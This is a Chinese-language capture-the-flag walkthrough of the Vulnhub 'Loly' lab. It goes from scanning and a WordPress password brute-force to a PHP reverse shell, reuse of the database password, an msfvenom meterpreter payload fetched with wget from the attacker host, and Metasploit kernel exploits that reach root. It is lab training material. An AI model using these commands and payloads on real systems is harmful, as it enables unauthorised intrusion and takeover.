Loly
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:64:18:1b 1 60 PCS Systemtechnik GmbH
192.168.56.251 08:00:27:ff:d3:51 1 60 PCS Systemtechnik GmbH
利用kali linux的netdiscover工具识别目标主机的IP地址为192.168.56.251
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.251 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-09 23:41 EDT
Nmap scan report for bogon (192.168.56.251)
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 08:00:27:FF:D3:51 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.23 seconds
NMAP扫描结果表明目标主机有1个开放端口:80(http)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ curl http://192.168.56.251/robots.txt
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
</body>
</html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ nikto -h http://192.168.56.251
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.251
+ Target Hostname: 192.168.56.251
+ Target Port: 80
+ Start Time: 2023-04-09 23:43:02 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.10.3 appears to be outdated (current is at least 1.14.0)
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-04-09 23:43:23 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
接下来利用gobuster工具扫描目标主机的目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ gobuster dir -u http://192.168.56.251 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.251
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/04/09 23:44:01 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 194] [--> http://192.168.56.251/wordpress/]
Gobuster工具识别出/wordpress目录,访问该目录,发现页面显示不完整,查看页面源代码可知主机名为loly.lc,将其加入到/etc/hosts文件中
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.251 loly.lc
刷新页面,即可显示正常页面,目标站点CMS为wordpress
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.251/wordpress -e u,p
_______________________________________________________________┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.251/wordpress -e u,p
_______________________________________________________________
wpscan工具扫描出用户名loly,看能否破解其密码?
(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.251/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: loly, Password: fernando
从而得到wordpress管理后台的用户名和密码:
username: loly
password: fernando
成功登录wordpress管理后台,
将shell.php文件压缩,可以成功上传
上传的位置在settings中有说明:
/var/www/html/wordpress/wp-content/
的banners下面
http://192.168.56.251/wordpress/wp-content/banners/shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.251] 54578
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
05:05:16 up 25 min, 0 users, load average: 0.00, 0.01, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 19 2020 .
drwxr-xr-x 22 root root 4.0K Aug 19 2020 ..
drwxr-xr-x 2 loly loly 4.0K Aug 20 2020 loly
www-data@ubuntu:/home$ cd loly
cd loly
www-data@ubuntu:/home/loly$ ls -alh
ls -alh
提权
ww-data@ubuntu:~/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
这会不会是loly的密码,尝试结果证明是正确的。
ww-data@ubuntu:~/html/wordpress$ su - loly
su - loly
Password: lolyisabeautifulgirl
loly@ubuntu:~$
loly@ubuntu:~$ id
id
uid=1000(loly) gid=1000(loly) groups=1000(loly),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
下一步是升级成meterpreter,在Kali Linux上利用msfvenom命令生成payload
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
然后将escalate.elf上传至目标主机,并修改权限
loly@ubuntu:/tmp$ wget http://192.168.56.230:8000/escalate.elf
wget http://192.168.56.230:8000/escalate.elf
--2023-04-10 05:16:22-- http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’
escalate.elf 100%[===================>] 207 --.-KB/s in 0s
2023-04-10 05:16:22 (69.4 MB/s) - ‘escalate.elf’ saved [207/207]
loly@ubuntu:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
然后在Kali Linux启动msfconsole,运行exploit/multi/handler,注意payload需要与之前的msfvenom命令的payload一致
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
在目标主机运行escalate.elf, Kali linux上得到了meterpreter会话
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Sending stage (989032 bytes) to 192.168.56.251
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.251:38704) at 2023-04-10 00:17:37 -0400
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
根据suggester的建议,选择其中一个漏洞进行提权
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/af_packet_chocobo_root_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show options
Module options (exploit/linux/local/af_packet_chocobo_root_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
TIMEOUT 600 yes Race timeout (seconds)
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/user/max_user_namespaces: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.9OOijSlS2' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...
id
[*] Sending stage (3020772 bytes) to 192.168.56.251
[*] Cleaning up /tmp/.9OOijSlS2 and /tmp/.Byr5rm0b..
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.251:34214) at 2023-04-10 00:22:57 -0400
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_file: Operation failed: 1
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) >
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > id
[*] exec: id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > use exploit/linux/local/bpf_sign_extension_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show options
Module options (exploit/linux/local/bpf_sign_extension_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.nwp6qQh5' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3020772 bytes) to 192.168.56.251
[*] Cleaning up /tmp/.nwp6qQh5 and /tmp/.mPFqG0 ...
[*] Meterpreter session 3 opened (192.168.56.230:8888 -> 192.168.56.251:34216) at 2023-04-10 00:23:39 -0400
meterpreter > shell
Process 20943 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
cd /root
ls -alh
total 32K
drwx------ 3 root root 4.0K Apr 10 04:38 .
drwxr-xr-x 22 root root 4.0K Aug 19 2020 ..
-rw------- 1 root root 1.6K Aug 20 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4.0K Apr 10 04:38 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 75 Aug 20 2020 .selected_editor
-rw-r--r-- 1 root root 266 Aug 19 2020 root.txt
cat root.txt
____ ____ ____ ____
/ ___| _ _ _ __ / ___/ ___|| _ \
\___ \| | | | '_ \| | \___ \| |_) |
___) | |_| | | | | |___ ___) | _ <
|____/ \__,_|_| |_|\____|____/|_| \_\
Congratulations. I'm BigCityBoy
至此成功提权,并拿到了root flag
经验教训
-
当把shell.php.zip文件上传后,需要些耐心找到该文件的位置